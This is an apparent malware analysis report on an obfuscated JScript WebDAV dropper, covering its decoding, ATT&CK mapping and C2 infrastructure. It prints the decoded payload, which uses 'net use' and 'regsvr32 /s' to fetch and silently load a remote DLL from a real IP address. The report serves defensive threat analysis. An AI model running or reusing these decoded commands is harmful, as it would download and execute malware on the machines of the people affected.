89fd643618c268008ce852b2a1e14d752dd6024eed078a3a7539425b5a186f2689fd643618c268008ce852b2a1e14d752dd6024eed078a3a7539425b5a186f26 — Deep Analysis Report
Filename: 3243530978161144024.js
Size: 108,073 bytes
Family: unclassified-js-webdav-dropper — ninety-seventh confirmed sibling.
Dynamic analysis: CAPE skipped — JScript is not a supported binary class ^[dynamic-analysis.md].
1. Build / RE
Language: JScript (Windows Script Host), single-line, no line terminators ^[file.txt].
Obfuscation engine: js-dictionary-char-lookup-obfuscation — a 100-entry random-noise dictionary (wqthp object) mapping meaningless 6-character lowercase keys (e.g. nupyd, davcd, cnamgz) to individual ASCII characters and control codes ^[strings.txt:1]. The payload string is assembled via nested Function("return this")()["eval"](...) constructors, chaining wqthp['key'] lookups with + concatenation. This is the same assembly pattern observed across the entire family ^[raw/analyses/fbdd83ad.../report.md] ^[raw/analyses/e2568b43.../report.md].
Decoding: Two-layer decode required. The outer layer uses the 100-entry dictionary to resolve character tokens inside a Function(...)["eval"](...) expression. The resolved inner payload is itself another Function("return this")()["eval"](...) construct that builds the final WScript.Shell command string. After full decode, the plaintext is:
Function("return this")()["WScript"]["CreateObject"]("WScript.Shell")["run"](
"powershell -EncodedCommand <base64>", 0, false
);
The Base64-decoded PowerShell command is:
timeout 1; plmzsx; net use \\94.159.113.84@8888\davwwwroot\; snidf;
regsvr32 /s \\94.159.113.84@8888\davwwwroot\300471679318983.dll; ovmjru
Anti-analysis: None. No debugger checks, no VM detection, no time-bombs, no connectivity gates. The timeout 1 is embedded in the inner PowerShell command, not in the JScript layer, and serves as a rudimentary anti-emulation delay ^[decoded-payload].
Code quality: Low — hand-written, repetitive, verbose, no commercial obfuscator signatures (no javascript-obfuscator, no RC4, no control-flow flattening). The 100-entry dictionary is larger than the family's historical 62-entry norm but smaller than the 100-entry maximum already observed in siblings fbdd83ad, e2568b43, c4670e86, f51f6323, f01dca2e, and 8323305a.
Signing / resources: N/A — text script, no Authenticode, no embedded PE resources.
2. Deploy / ATT&CK
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | .js file executed by WScript ^[file.txt] |
| Execution | T1059.001 (PowerShell) | powershell -EncodedCommand wrapper ^[decoded-payload] |
| Execution | T1218.010 (Regsvr32) | regsvr32 /s \\94.159.113.84@8888\davwwwroot\300471679318983.dll ^[decoded-payload] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | wscript.exe → powershell.exe → regsvr32.exe proxy chain ^[decoded-payload] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 100-entry noise-dictionary JScript obfuscation ^[strings.txt:1] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP (\\94.159.113.84@8888\DavWWWRoot\) ^[decoded-payload] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[decoded-payload] |
C2 / Infrastructure:
- Host:
94.159.113.84:8888— same IP as six prior siblings (fbdd83ad66th,e2568b4383rd,c4670e8676th,f51f632389th,f01dca2e86th,8323305a94th). This is the seventh sibling on this exact endpoint, confirming sustained activity. - Payload:
300471679318983.dll(numeric filename, consistent with family naming). - Execution mode:
regsvr32 /s(silent DLL registration), notrundll32 ...,Entry.
Persistence: None observed. One-shot execution via WScript.Shell.run() with windowstyle=0, wait=false. No registry writes, no scheduled tasks, no startup-folder copies ^[decoded-payload].
Lateral movement / Exfiltration: None observable statically. The DLL payload is not present in corpus; only the dropper stage is analysed here.
Attribution: No linguistic clues (keys are noise, no semantic content). Infrastructure overlap with the 94.159.113.x:8888 subnet is the only linkage. No code-reuse signatures beyond the family's shared assembly engine.
3. Verdict
High-confidence sibling of unclassified-js-webdav-dropper. The 100-entry dictionary size, wqthp object name, Function("return this")() assembly, PowerShell -EncodedCommand wrapper, and 94.159.113.84:8888 C2 are all consistent with established family patterns. No new capabilities or anti-analysis measures beyond the family's baseline.
Provenance:
- Static decode performed on 2026-07-23 via Python regex-based token replacement and string-concatenation collapse.
dynamic-analysis.mdconfirms CAPE skipped (not a binary) ^[dynamic-analysis.md].- All behavioural claims derive from the decoded payload string; no runtime execution performed.